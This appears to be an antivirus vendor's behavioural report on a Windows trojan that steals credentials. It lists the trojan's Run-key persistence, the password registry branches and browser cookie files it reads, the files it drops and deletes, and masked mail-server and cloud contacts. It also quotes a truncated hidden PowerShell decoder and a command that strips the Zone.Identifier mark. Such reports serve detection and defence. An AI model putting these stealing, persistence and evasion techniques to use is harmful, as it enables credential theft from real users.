Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MyWafaa' = '%APPDATA%\MyWafaa\MyWafaa.exe'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function b5752 { param($ga9ba) $v52df = 'kaeeed3';$n8979 = ''; for ($i = 0; $i -lt $ga9ba.length; $i+=2) { $d59b895 = [convert]::ToByte($ga9ba.Substring($i, 2), 16); ...
Injects code into
the following user processes:
- p7e63c.exe
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\RimArts\B2\Settings]
- [<HKCU>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions]
- [<HKCU>\Software\FTPWare\COREFTP\Sites]
Reads files which store third party applications passwords
- %APPDATA%\thunderbird\profiles.ini
- <LS_APPDATA>\google\chrome\user data\default\cookies
Modifies file system
Creates the following files
- %TEMP%\scwgbrh2.0.cs
- %APPDATA%\024jhxbo.wmz\firefox\profiles\gn7ryp3k.default\cookies.sqlite
- %APPDATA%\024jhxbo.wmz\opera\cookies
- %APPDATA%\024jhxbo.wmz\chrome\default\cookies
- <LS_APPDATA>\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %APPDATA%\024jhxbo.wmz\thunderbird\profiles\wjj9aet2.default\cookies.sqlite
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %APPDATA%\p7e63c.exe
- %TEMP%\scwgbrh2.dll
- %TEMP%\resc95.tmp
- %TEMP%\cscc85.tmp
- %TEMP%\scwgbrh2.out
- %TEMP%\scwgbrh2.cmdline
- %APPDATA%\mywafaa\mywafaa.exe
- %APPDATA%\024jhxbo.wmz.zip
Deletes the following files
- %TEMP%\resc95.tmp
- %TEMP%\cscc85.tmp
- %TEMP%\scwgbrh2.0.cs
- %TEMP%\scwgbrh2.pdb
- %TEMP%\scwgbrh2.cmdline
- %TEMP%\scwgbrh2.out
- %TEMP%\scwgbrh2.dll
- %APPDATA%\024jhxbo.wmz\chrome\default\cookies
- %APPDATA%\024jhxbo.wmz\firefox\profiles\gn7ryp3k.default\cookies.sqlite
- %APPDATA%\024jhxbo.wmz\opera\cookies
- %APPDATA%\024jhxbo.wmz\thunderbird\profiles\wjj9aet2.default\cookies.sqlite
- %APPDATA%\024jhxbo.wmz.zip
Network activity
Connects to
- 'ma##.#afaagroup.net':587
TCP
HTTP GET requests
- http://ch#####.amazonaws.com/
UDP
- DNS ASK cl####ro-africa.com
- DNS ASK ch#####.amazonaws.com
- DNS ASK ma##.#afaagroup.net
Miscellaneous
Creates and executes the following
- '%APPDATA%\p7e63c.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\scwgbrh2.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC95.tmp" "%TEMP%\CSCC85.tmp"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C type nul > "%APPDATA%\p7e63c.exe:Zone.Identifier"' (with hidden window)
Executes the following
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\scwgbrh2.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC95.tmp" "%TEMP%\CSCC85.tmp"
- '%WINDIR%\syswow64\cmd.exe' /C type nul > "%APPDATA%\p7e63c.exe:Zone.Identifier"
